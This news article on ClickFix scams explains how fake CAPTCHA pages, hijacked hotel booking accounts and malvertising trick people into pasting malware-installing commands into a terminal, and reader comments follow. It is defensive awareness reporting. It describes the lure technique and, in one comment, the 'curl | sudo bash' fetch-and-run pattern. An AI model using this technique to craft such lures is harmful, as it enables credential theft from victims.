Skip to content
COPY, PASTE, INFECT

ClickFix may be the biggest security threat your family has never heard of

Relatively new technique can bypass many endpoint protections.

Dan Goodin | 181
A stylized skull and crossbones made out of ones and zeroes.
Credit: Getty Images
Credit: Getty Images
Story text

Over the past year, scammers have ramped up a new way to infect the computers of unsuspecting people. The increasingly common method, which many potential targets have yet to learn of, is quick, bypasses most endpoint protections, and works against both macOS and Windows users.

ClickFix often starts with an email sent from a hotel that the target has a pending registration with and references the correct registration information. In other cases, ClickFix attacks begin with a WhatsApp message. In still other cases, the user receives the URL at the top of Google results for a search query. Once the mark accesses the malicious site referenced, it presents a CAPTCHA challenge or other pretext requiring user confirmation. The user receives an instruction to copy a string of text, open a terminal window, paste it in, and press Enter.

One line is all it takes

Once entered, the string of text causes the PC or Mac to surreptitiously visit a scammer-controlled server and download malware. Then, the machine automatically installs it—all with no indication to the target. With that, users are infected, usually with credential-stealing malware. Security firms say ClickFix campaigns have run rampant. The lack of awareness of the technique, combined with the links also coming from known addresses or in search results, and the ability to bypass some endpoint protections are all factors driving the growth.

“This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors,” researchers from CrowdStrike wrote in a report documenting a particularly polished campaign designed to infect Macs with a Mach-O executable, a common binary that runs on macOS. “Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks.”

The primary piece of malware installed in that campaign is a credential-stealer tracked as Shamos. Other payloads included a malicious cryptocurrency wallet, software for making the Mac part of a botnet, and macOS configuration changes to allow the malware to run each time the machine reboots.

Another campaign, documented by Sekoia, targeted Windows users. The attackers behind it first compromise a hotel’s account for Booking.com or another online travel service. Using the information stored in the compromised accounts, the attackers contact people with pending reservations, an ability that builds immediate trust with many targets, who are eager to comply with instructions, lest their stay be canceled.

The site eventually presents a fake CAPTCHA notification that bears an almost identical look and feel to those required by content delivery network Cloudflare. The proof the notification requires for confirmation that there’s a human behind the keyboard is to copy a string of text and paste it into the Windows terminal. With that, the machine is infected with malware tracked as PureRAT.

Push Security, meanwhile, reported a ClickFix campaign with a page “adapting to the device that you’re visiting from.” Depending on the OS, the page will deliver payloads for Windows or macOS. Many of these payloads, Microsoft said, are LOLbins, the name for binaries that use a technique known as living off the land. These scripts rely solely on native capabilities built into the operating system. With no malicious files being written to disk, endpoint protection is further hamstrung.

The commands, which are often base-64 encoded to make them unreadable to humans, are often copied inside the browser sandbox, a part of most browsers that accesses the Internet in an isolated environment designed to protect devices from malware or harmful scripts. Many security tools are unable to observe and flag these actions as potentially malicious.

The attacks can also be effective given the lack of awareness. Many people have learned over the years to be suspicious of links in emails or messengers. In many users’ minds, the precaution doesn’t extend to sites that instruct them to copy a piece of text and paste it into an unfamiliar window. When the instructions come in emails from a known hotel or at the top of Google results, targets can be further caught off guard.

With many families gathering in the coming weeks for various holiday dinners, ClickFix scams are worth mentioning to those family members who ask for security advice. Microsoft Defender and other endpoint protection programs offer some defenses against these attacks, but they can, in some cases, be bypassed. That means that, for now, awareness is the best countermeasure.

Photo of Dan Goodin
Dan Goodin Senior Security Editor
Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him at here on Mastodon and here on Bluesky. Contact him on Signal at DanArs.82.
181 Comments
Staff Picks
p
plectrum
Jesus God. Apparently I expect too much from people, given that this is apparently a thing that people actually do. And my expectations are already so low!
Looking at the linked sites, it's being presented as a way to fix a problem you already have with your machine. eg 'How to add a printer to your Mac': 'first plug in the printer. It should be autodetected in Add Printers. If so you're all good. If not run this command...'

Given the tendency for genuine tech support (especially on Linux) to culminate in 'just run this opaque command to fix your problem' I can see it being potent - when users are asked to 'just run "sudo apt-get update ; sudo apt-get install libfoo-dev"' I can see how they might be hoodwinked into doing something malicious.

And let's not get started on the "curl | sudo bash" trope...
Cthel
Cthel
The compromised hotel booking accounts is huge. With that kind of access it's easy to see how attackers might be doing all kinds of stuff.

But asking a user to copy paste into the terminal? The typical user has no idea how to open the terminal. Most modern users can't even find the start menu. The venn diagram of "capable of opening the terminal" and "will fall for this attack" contains maybe a group of precocious twelve year olds, and that's about it.

If they compromised StackOverflow or ChatGPT, that would be a massively successful attack, because users will copy-paste shit from those sites blindly.
That's why the instructions say "press windows key+R then type/paste cmd and hit enter"

People who don't know what the terminal is are more likely to paste an inscrutable text string into the window that opens as a result, as they don't recognise the danger
VividVerism
VividVerism
I am a retired home laptop user. I always sign in as 'standard windows user'. If I open the terminal and mindlessly copy/paste/return (run) - will Windows automatically ask for admin credentials before running the malicious code?
OK. I've read nearly 100 comments here so far.

Unless I'm missing something, doesn't this "just happen" require the current user to be running as an admin user or enter admin credentials at some point in the process?

I saw three comments referring to this but shouldn't an article like this be explicit in this bit of information.

Which is one reason I'll not work with people who refuse to operate day to day as a non admin user?

No, any user can run basic commands in a terminal window or the Windows run dialog. No admin access is needed unless they are trying to install something to a location that needs admin access. Most of the things you care about the malware doing, like password theft, browser session hijacking, installing malicious browser extensions, ransomware to block access to your files, etc. can all be done without admin.
d
dangoodin
Jesus God. Apparently I expect too much from people, given that this is apparently a thing that people actually do. And my expectations are already so low!
You have no friends/relatives with neurodivergence? No friends/relatives with cognitive decline that occurs naturally in many people as they age? No friends/relatives who are so uncomfortable with the Internet that they don't know how to make informed decisions? No friends/relatives who are currently under emotional distress?

These are just a few of the things that make people fall for these scams. They often bear major humiliation and self blame afterward. Please make more of an attempt to show understanding and compassion.
Prev story
Next story